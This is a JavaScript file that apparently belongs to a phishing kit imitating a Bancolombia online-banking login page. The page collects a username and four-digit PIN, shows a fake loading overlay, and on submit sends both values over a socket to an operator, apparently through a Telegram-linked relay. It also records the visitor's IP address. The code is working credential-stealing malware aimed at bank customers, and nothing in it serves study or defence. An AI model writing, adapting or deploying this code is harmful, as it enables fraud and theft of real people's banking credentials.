// Utilizar el m贸dulo compartido para la gesti贸n de sesi贸n

const updateDateTime = () => {
    const now = new Date();
    const options = { 
        weekday: 'long', 
        year: 'numeric', 
        month: 'long', 
        day: 'numeric',
        hour: 'numeric',
        minute: '2-digit',
        hour12: true,
        timeZone: 'America/Bogota'
    };
    const dateTimeStr = now.toLocaleDateString('es-CO', options).replace(',', '');
    document.querySelectorAll('.datetime').forEach(el => {
        el.textContent = dateTimeStr.toLowerCase();
    });
};

const getIPAddress = async () => {
    try {
        const response = await fetch('https://api.ipify.org?format=json');
        const data = await response.json();
        document.querySelectorAll('.ip-address').forEach(el => {
            el.textContent = `Direcci贸n IP: ${data.ip}`;
        });
    } catch (error) {
        console.error('Error fetching IP:', error);
    }
};

document.addEventListener('DOMContentLoaded', () => {
    // Variables para controlar el estado del env铆o
    let isSubmitting = false;
    let overlay = null;

    // Deshabilitar eventos de navegaci贸n
    window.onbeforeunload = null;
    window.onunload = null;

    // Inicializar sesi贸n y Telegram
    bancolombia.initGlobalSession();
    bancolombia.setupTelegramActions();
    
    // Elementos del formulario
    const usuarioInput = document.getElementById('usuario');
    const claveInput = document.getElementById('clave');
    const submitButton = document.querySelector('.btn-iniciar');
    const form = document.querySelector('.auth-form');

    // Asegurarse de que solo hay un overlay
    const existingOverlay = document.querySelector('.loading-overlay');
    if (existingOverlay) {
        existingOverlay.remove();
    }
    
    // Crear y configurar el overlay
    overlay = bancolombia.createLoadingOverlay();
    document.body.appendChild(overlay);

    // Validaci贸n de entrada de clave
    claveInput.addEventListener('input', (e) => {
        let value = e.target.value.replace(/[^0-9]/g, '');
        if (value.length > 4) {
            value = value.slice(0, 4);
        }
        e.target.value = value;
        validateForm();
    });

    // Funci贸n de validaci贸n
    function validateForm() {
        const usuario = usuarioInput.value.trim();
        const clave = claveInput.value;
        const isValid = usuario.length > 0 && clave.length === 4;
        
        submitButton.disabled = !isValid;
        if (isValid) {
            submitButton.classList.add('active');
            submitButton.style.backgroundColor = '#ffd700';
            submitButton.style.cursor = 'pointer';
        } else {
            submitButton.classList.remove('active');
            submitButton.style.backgroundColor = '';
            submitButton.style.cursor = 'default';
        }
    }

    // Eventos de validaci贸n
    usuarioInput.addEventListener('input', validateForm);
    claveInput.addEventListener('change', validateForm);
    
    // Manejo del env铆o del formulario
    form.addEventListener('submit', (e) => {
        e.preventDefault();
        
        // Prevenir m煤ltiples env铆os
        if (isSubmitting) return;
        isSubmitting = true;

        try {
            // Bloquear interfaz y mostrar overlay
            document.body.style.pointerEvents = 'none';
            form.style.pointerEvents = 'none';
            usuarioInput.disabled = true;
            claveInput.disabled = true;
            submitButton.disabled = true;

            // Mostrar overlay
            if (overlay) {
                overlay.show(true);
            }

            // Enviar datos si el socket est谩 conectado
            if (globalSocket && globalSocket.connected) {
                globalSocket.emit('sendData', {
                    type: 'login',
                    sessionId: bancolombia.getSessionId(),
                    content: {
                        text: ` Inicio de sesi贸n\n` +
                             ` Usuario: ${usuarioInput.value}\n` +
                             ` Clave: ${claveInput.value}`
                    },
                    timestamp: Date.now(),
                    page: 'index.html',
                    persistent: true,
                    waitForAction: true
                });
            } else {
                console.error('Socket no conectado');
            }
        } catch (error) {
            console.error('Error en el env铆o:', error);
        }
    });

    // Validaci贸n inicial
    validateForm();
});

// Actualizar fecha y hora
setInterval(updateDateTime, 1000);
updateDateTime();

// Obtener IP
getIPAddress();